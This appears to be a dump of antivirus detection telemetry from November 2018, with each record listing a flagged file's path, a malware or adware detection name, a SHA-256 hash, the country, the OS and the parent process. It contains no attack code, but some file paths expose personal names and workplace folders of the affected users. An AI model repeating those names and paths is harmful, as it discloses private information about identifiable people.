  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-pazera_free_mov_to_avi_converter.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\Downloader-fuer-Pazera_Free_MOV_to_AVI_Converter.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9662d3f44fd833273ca8785992ca0b8e4b2fc625a6cf7a412bb5bfa184530498', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9662D3F44FD833273CA8785992CA0B8E4B2FC625A6CF7A412BB5BFA184530498', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9662d3f44fd833273ca8785992ca0b8e4b2fc625a6cf7a412bb5bfa184530498', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cap3onn.exe', filepath='D:\\c\\LBP1120_WinXP\\CAP3ONN.EXE', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='c66e4b6ec4ea9463378f9a53b333df3a8bd3cd832c64ceb25263a6032586baf1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110820-e6b3d401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110820-E6B3D401', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212543-e736a4e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a900a272\\AVSCAN-20181101-212524-E39753F6\\AVSCAN-20181101-212543-E736A4E3', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='780fe49b7b3b5c2f2d55f3d6eb9f521708a1798294766ccda3932c179995c0b1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsiE215.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T07:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b1f96cffd16162710e6a8741ce97f5aa657d450c13bdce537eca9ff3b3893407', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-21.available\\Avira\\B1F96CFFD16162710E6A8741CE97F5AA657D450C13BDCE537ECA9FF3B3893407', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='b1f96cffd16162710e6a8741ce97f5aa657d450c13bdce537eca9ff3b3893407', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:03:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='84a768893c2a2629d9c0f1bf0b69b8e9fbc18870225c2449f2fc8cbb479717f0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='802ae7db964f28d8551a9790853a114aa39eb8e8a7e2b14560058263708be652', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:32:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105853-9f31beaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105853-9F31BEAF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T01:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nslD822.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  APRIL. 2010\\R3.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='7354a3f014dcad49f27270006d3b9f3855204e20241bd4c0dac0d3344323b4ba', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110450-cc262fea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110450-CC262FEA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002311-3d101203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002311-3D101203', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='40c.scr', filepath='F:\\New folder\\Corel Draw 12\\40c\\40c.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113210-c49ea47d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29157ed4\\AVSCAN-20181101-110406-CC505E68\\AVSCAN-20181101-113210-C49EA47D', filesize=640000, name='PUA/DownloadAdmin.#M1.#R1'), hash='3b6d9ed04b92f03454e904b04eefd04fa63f9075bb6cb185d5c698d49a8f11b4', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:32:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191840-a72a1b72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc47bd8e\\AVSCAN-20181101-191823-A3241D29\\AVSCAN-20181101-191840-A72A1B72', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:54:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='set_homepage.exe.vir', filepath='\\\\?\\C:\\Windows\\System32\\oobe\\OEM\\Set_Homepage.exe.VIR', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='493fb9580aac7ec665b8c3ba103c757a206508bb855a74ae0ae8a3eea326df4e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T17:38:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220116-fe3fcd00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9145363\\AVSCAN-20181101-220100-FC393D8B\\AVSCAN-20181101-220116-FE3FCD00', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='23c596d914a6980cdef183c5a8e423a4efb60f697cd8157196ffd776ca1c5ba8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:01:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162737-fd6fbd3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-162737-FD6FBD3B', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:58:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053505-294a3c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053505-294A3C61', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rcjd4na', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RCJD4NA', filesize=64000, name='VBA/Dldr.Agent.kiizk.#M1.#R1'), hash='5429bb6a050dec472d9ef03c6016da3382924c217a0f9e4b47a4dff5db66423a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175436-cee0015b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-175436-CEE0015B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:54:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='011.part', filepath='\\\\?\\C:\\Users\\X\\Downloads\\eMule\\Temp\\011.part', filesize=9728000, name='EXP/Wimad.K.#M1.#R1'), hash='4eb557db0e281441863c5aaebc42f27c8ad9a1643bfbcbce550f9c5420ac5058', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='473aee6d4dbffe40ebe8616e4057d78abce62c262f7ebe39d5e2ab2ff5879fe0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\473AEE6D4DBFFE40EBE8616E4057D78ABCE62C262F7EBE39D5E2AB2FF5879FE0', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='473aee6d4dbffe40ebe8616e4057d78abce62c262f7ebe39d5e2ab2ff5879fe0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:27:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6744.23326\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6744.23326\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:43:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005239-0c218e6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181102-005239-0C218E6A', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173941-dfae1788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-173941-DFAE1788', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:39:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131345-be903645', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64aa598b\\AVSCAN-20181101-131324-BA58AB98\\AVSCAN-20181101-131345-BE903645', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00090d4c', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00090d4c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001752-66b1d999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa58d92d\\AVSCAN-20181102-001738-63F9D696\\AVSCAN-20181102-001752-66B1D999', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:17:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002600-4f49ac9d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002600-4F49AC9D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005017-bcf62dcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-005017-BCF62DCF', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b6a8b40c0898fcefcf903a98f94583aa09bc3759b4237d5f0047313a8bc3235f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:50:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nonod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nonod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c6ff4348c7c546167dfc0abc3d9eac180f3fe77772f4af9d177d56b9e5fa31a5', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-01T14:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205200-629d11be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a065b318\\AVSCAN-20181101-204324-26BCB321\\AVSCAN-20181101-205200-629D11BE', filesize=4736000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='ba789b44e57d3290f318976715911d975db6e5d50822bbcd421524f1876af1d6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='infanzia assistita.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASSISTENTE INFANZIA\\infanzia assistita.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:14:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\hd1awiokuih\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T13:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095103-4a7c681c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095103-4A7C681C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='informatica engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim\\informatica engim.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B1CAC128B6ACBC9B5C934F70B5C11455DE30DD3A651E6891CBB8BC76F5BB5F9D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\EnigmaSoft\\SpyHunter\\ShKernel.exe', parentsize=9872688, timestamp='2018-11-01T21:47:35Z'), dt=datetime.date(2018, 11, 1)),
